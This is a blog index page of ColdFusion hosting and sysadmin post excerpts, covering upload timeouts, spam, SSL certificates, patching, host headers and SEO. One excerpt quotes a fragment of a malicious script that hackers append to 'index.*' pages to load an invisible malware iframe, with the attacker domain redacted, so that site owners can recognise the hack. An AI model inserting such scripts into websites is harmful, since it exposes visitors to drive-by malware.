ColdFusion Muse

Upload Problem Post-Mortem

We had a ticklish issue arise with a customers recently. We host an application for them that allows them to upload files. As they began to use the application more heavily they noticed that file uploads above a certain size were failing. The size was fairly modest. Uploads sized between 1 and 4 megs were simply timing out. We eventually came up with a solution, but not before some head scratching. Here is the play-by-play.


New Spam Bot Cracking Captcha Perhaps?

When I arrived at work this morning I found more than 280 spam links posted as comments to various entries on my blog. They were all for certain articles of clothing which shall remain nameless (but some of them are made for walking). Now occasionally, about 3 or 4 times a week, I'll see a single spammy comment posted and I just kill it - cased closed. The Captcha keeps out most automated spam, so I figure any spam I get is individuals paid to labouriously post links. This seemed like more than that - both in volume and in the systematic way it was perpetrated. I will be keeping a close eye on it - but it makes me wonder if there is a bot out there that has cracked my captcha.

Meanwhile, my sincerest apologies to anyone subscribed to any post of mine who had to suffer through these emails. The Muse will do what he can to make sure it is not a commmon occurance.

Certificate Renewal Follies in IIS 7

I have a few Win2008 servers under management and I had to renew a cert for one of them today. Now I confess this is the first time I had to do this particular task so there was some head scratching involved. I learned a number of things that might be of some use to you if you are up against this task. In this case I was renewing a Verisign cert. Here's what I learned.


Iframe Insertion on Index.* Home pages

There's a hack that's beginning to be active that targets pages named "index.*". Actually it sounds rather like an old hack that is resurfacing. Since many ColdFusion sites use this convention for the home page this attack tends to hit quite a few ColdFusion sites that are vulnerable. The attack appends a script like this one to the bottom of each "index.*" page:

<sc ript>
var applstrna0 = " ;
var applstrna1 = "rame src=http://***Domain Host Name****";
var applstrna2 = ".com/bb/faq.htm";
var applstrna3 = " width=100 height=0> ;
var applstrna4 = "frame>";
Please note that I have not included the actual url of this attack. The domain includes the string "said7". I am only making sure I mention said7 so that folks searching for info on this attack can find this specific post and possibly be helped. I have no wish to benefit the said7 effort and I hope they all get dysentery and spend the weekend in the latrine.

As you can see the script itself is pretty simple. It writes out an invisible Iframe to the bottom of the page. The target of the Iframe attempts to download a trojan or malware to the users machine. This attack is insidious and I have yet to discover the origin. But I do know a few things about it - and how to prevent it from continuing. One important thing to note, if you have this problem and Google indexes your sites and sees these pages they will flag your site. Browsers like Firefox use the Google service to throw up a big "malware" warning.

The following article details the attack and the notes I've gathered about it. Some day soon I hope to post a more definitive who, what, when and why post about it. To gather the following notes I'm indebted to the folks on the CF-Talk List (this thread), Nathan, Nick, Jason, Scott, Don and probably a few others I am forgetting. I can't give away too much info here - but please accept my thanks.


Coldfusion, SSL 3.0 and

I've been batting this around for a few days now. Recently, Mary Jo Sminkey of CF Webstore fame posted a note to an email list about the recent requirement by that incoming requests to their API use SSL 3.0. I confess to being unaware of the differences between SSL 2.0 and 3.0. So I set out to discover for myself. To start with SSL 2.0 uses weaker handshaking. A requesting client can, it seems, edit the list of preferences leaving the server no choice but to hand shake with the "lowest common denominator" cipher. There are some other issues as well dealing with how the packets are constructed etc. So the consensus is that SSL 2.0 is the weak sister and should be deprecated. For its part SSL 3.0 has been around for a decade or so and is widely supported.

The question is, will my CFHTTP calls from ColdFusion 6 or Coldfusion 7 still work when disables SSL 2.0? To answer this question I got some great help from Scott Krebs over at Edge Web. He dug out three or four URLs that were really helpful. I've included them at the bottom of this post. I also got some guidance from the Stephen Hawking of cryptography, Mr. Dean H. Saxe (the H is for Holy Cow he knows a lot). The answer is a qualified yes. Anyway, here's what I did to test while I wait for to get their act together and set up a test bed.


When Patches Attack

Last night I was sitting at home and using my VPN to dial into one of our servers (a Win2k3 server). I noticed that there were a couple of patches pending installation. Now as a rule I do not run every patch, nor do I ever let windows "manage" patching for me. Instead, I let windows download the patches and I choose when and what to install. Still, a couple of these patches were important security fixes (Usually a good idea) so I installed them. Now windows does not always require a reboot after patching, but sometimes it does, and yes it is one of the annoying things about Windows, so please don't use this post to comment on how much better Linux is than Windows or cheese or Santa Clause or sex or whatever. Anyway, this time it did ask and when I chose to restart things went "a bit wonky" as some of my UK readers might say.


Checking the Size of the Spool Directory on Windows

If you ever send out a few tens of thousands of messages using CF you know the spool directory can get pretty crowded. If you are like me you sometimes want to keep an eye on it as those messages clear out to make sure there is nothing funky going on. If you use Windows Explorer this can be a maddening experience. Windows doesn't just retrieve a count of files. It retrieves the entire file list and meta data and it redraws the explorer window. When you have 50k messages in the spool folder it can take 10 to 30 seconds just for Windows to refresh the count so you can know how many were added or deleted to the folder.

Instead, I use a little tool called "t4edirsize" from tools 4 Ever. I have a "show spool" batch file on my servers that looks like this:


t4edirsize.exe d:\cfusion8\mail\spool
The output gives me all sorts of information including the number of files in the directory - but it usually only takes 50-200 milliseconds to run. Tools 4 ever command line tools along with Sys-Internals tools (now owned by Microsoft) like "pslist" and "pskill" are essential to your arsenal as a troubleshooter.

Virtual Sites and "Host Headers" Explained

Some web developers never bother to learn the nitty gritty stuff that makes up the Internet. I've seen very bright programmers who don't know the difference between a GET request and a POST request (or why they should care). In your journey through the IT landscape it would behoove you to pick up a few tips on how the web actually works. In my view you should know the basics of how a web server and browser work together to deliver content. You should know how to setup a web site in IIS or Apache, and you should know when to use a GET and when to use a POST. It also wouldn't hurt to learn about IP addressing, routing, classless subnets, ARP Caching, application pools, JVM Garbage collection, the theory of relativity and the meaning of life.... but I digress.

Among the items I find myself explaining over and over is the concept of a "HOST Header" and how it's used on a web server. Like many of my blog posts this one is intended to help me so I can point to it and not have to repeat myself. Now to be fair, this topic is one I sometimes have to cover with customers and site owners who need to know the difference between a dedicated IP address and a "virtual site". Either way, here's a run down of "virtual sites" and "host headers".


Search Engine Safe URLs and Semantic Parameters

This topic crops up frequently in our line of work. Among the items that are often listed as important to search engines are "search engine safe" (SES) URLs. It has been pointed out that Google will index just about anything - including obscure looking URLs with cryptic parameters on them. Although this is true, we shall see that it does not exempt the developer from paying attention to the URL when he or she is thinking about search engine optimization. Let me explain.


Targeting Web Masters: Spamming's New Low

Fighting spam is a lot like those movies where blood sucking zombies just keep coming at you in a never ending supply of non-descript humanoids who want to eat your brain or take out your daughter. I can live with having to keep filters up to date. I know how to use SPF, Spam Assassin and client side filters like spambayes (check it out if you are an outlook user). I can even live with the bots constantly attacking my web forms and trying to hack them to send their own mail. But I think I have stumbled onto a technique that smacks of desperation.

Occasionally I view a stats report for my blog. I use Smarter Stats from "Smarter Tools". It's quite good and it gives me some excellent reporting options (I also love their "Smarter Mail" server). One of the reports I like to view is "referring sites". Mostly I'm just snooping to see if any CF big wigs like Ben Forta, Sean Corfield or Ray Camden have linked to my blog (we keep a bottle of champaigne on ice for those occasions). It is interesting to see all of the sites that are listed. All of our CF Webtools blogs are cross linked so I see them listed as I would expect. Google, MSN and Yahoo are all represented as are blog aggregators like fullasagoog and the old Macromedia weblog aggregator. Interestingly I see some international sites like and

All of these I can explain and understand how they arrived in my log files. But here's a couple I can't explain. There is a link to a site called "" - which I took to be another blog portal. When I went to the site it is actually a personal loan information site. A closer look discovered sites like "topsecuredloan","onlineapoker", "insurede" and others less benign. How are these particular referring sites getting into my log files? I have a couple of guesses.

My first guess has to do with email. If you are using a web based email client like Yahoo, and someone sends you an email with a link in it, when you click on the link the "referring site" is actually something like "". So perhaps these sites are showing up because someone is clicking on a link in a web based email client that uses that domain. I kind of find this explanation unlikely. Would anyone really be checkign their mail at a domain like I suppose if they were using a web host where it was set up that way it could happen.

My second guess is that someone clicked on a Google ad for Coldfusion Muse. I quickly went to my ad words account and verified that I am not set up to serve Google ads for my blog. We only serve ads for our main web site, CF Webtools.

There may be other explanations, but at least one that I can think of is that it is a new form of spam. It would be trivial to create a bot that issues web requests with a specific referrer. After all, adding your site as a referring site causes your link to show up in reports and sometimes someone (like myself) will click on it. Of course it would only target folks who are looking at web log reports. Can any muse readers provide any alternate theories? It certainly seems like an act of desperation - or perhaps just too easy to pass up. In any case, I'm off to apply for a 22% loan. Tata.

From Server "A" to Server "B" - Details Matter When Re-hosting

You probably know that CF Webtools hosts a fair number of sites in our own burgeoning data center. We are not a commodity host (i.e. Godaddy or HostMySite). Instead, we host a large group of Farcry sites, several dedicated servers, and a large group of very complicated Coldfusion sites with special requirements (data feeds, point to point encryption, data aggregation and third party secure services etc.). Our hosting has grown substantially in the last year and has become an excellent revenue center for us.

One of the type of projects we find ourselves doing with some regularity is a "site re-host". Usually a company has an application that clearly requires more help and attention than can be gained using a commodity host and self service control panels. Furthermore, such sites have often "evolved" from widgety little intranet type sites with B2B tools, special custom ecommerce applications or homegrown CMS capabilities into monsters of maintenance with hundreds of pages (many of them titled stuff like "order_bak.cfm" or "index.old"). Incidently never leave a file like "index.old" on your web site. If the web server is in default config mode it can serve that file up to your user without running it through the Coldfusion engine. That exposes your code and makes you easier to attack.

In any case, re-hosting a site seems like a simple enterprise. If your site consists of a database and codebase then it can be simple - but the devil is in the details (and in the cat as my Dad use to say). Here is a rundown that you might find useful.


Search Engines Series Pt. 2.b - Links, Content and Format

In this post, part 2 "b" in our search engine series, we will discuss how the content and structure of your page might influence how your site is viewed by search engines. In part 1 we talked about having useful and valuable content. That lesson is the foundation on which all other legitimate techniques must be based. If your content is not useful you are part of the problem we are trying to solve. In Part 2 "a" we talked about stuff that goes into the header. Now it's time to talk about things that go into the actual page.


Search Engines Series Pt. 2 - Coding The Header

In this post, part 2 in our search engine series, we will discuss important aspects of coding and designing that will facilitate easier indexing by search engines and create a higher likelihood of a rising page rank. In Part 1 of this series we discussed the concept that your web site needs valuable and fresh content to really be useful to search engines. Without useful content your web site will not be a destination that anyone wants to visit, and therefore it will not be something that search engines (who are customer focused) want to index. Keep part 1 in mind as we discuss what you can do with your code and with your pages. Unless you have solved the puzzle of maintaining fresh and valuable content on your web site, you will be spinning your wheels.

Of course, you can use certain techniques to get yourself ranked high - at least temporarily. But my guess is that you will spend just as much time changing your code in a running battle to keep yourself on top of Google as you would if you learned to write and maintain good information on your site. By the way, those "black-hat techniques" are not discussed in this post. This post is about preparing your valuable content to be consumed by a search engine that wants and needs it - not about tricking a search engine into indexing less than worthy content. With that in mind....


Search Engines Series Pt. 1 - Content is King

Practically every day a customer of ours will ask us about search engine optimization (SEO). It usually starts with something like, "What can I do to get ranked higher on search engines?" or "Why doesn't my site show up on Google?" or maybe "How do I use this new fangled contraption called a mouse?" I usually begin by patiently explaining that SEO is kind of an art - a dance between developer coding techniques, business strategies, content and the search engine. It's a boxing match where everyone has a part to play and the ground is always shifting. I go on from dancing and boxing to several other metaphors involving movement and competition (and one involving cheese). Then I recommend a few changes. At this point the customer usually says something like, "...and that will get me on the first page of search engines, right?" To answer I usually tell the Joke about MTV asking Bob Dole the same question they asked Clinton, "Do you wear boxers or briefs". Seventy year old Dole responded, "Depends".

(Series: click here for Part 2 - The Header )


Verisign and Kafka - Separated at Birth?

So you want an SSL certificate and your customer insists on using Verisign eh? Here's something to watch out for - the "domain registrant". In case you needed another indicator that the whole SSL "authority" game is a protection racket, let me fill you in on my tail of woe. I have a customer who insisted on using Verisign for his SSL certificate. I dutifully went to Verisign and purchased the overpriced product and waited for my new cert to arrive. Shortly after the purchase I got a note from Verisign support. My customer in his wisdom had made the domain private. Because a "WHOIS" query identified the domain as private, Verisign couldn't verify that they "owned" the domain. Our first step was to make the information public. That turned out to be only the beginning of our trouble.


More Entries

Blog provided and hosted by CF Webtools. Blog Sofware by Ray Camden.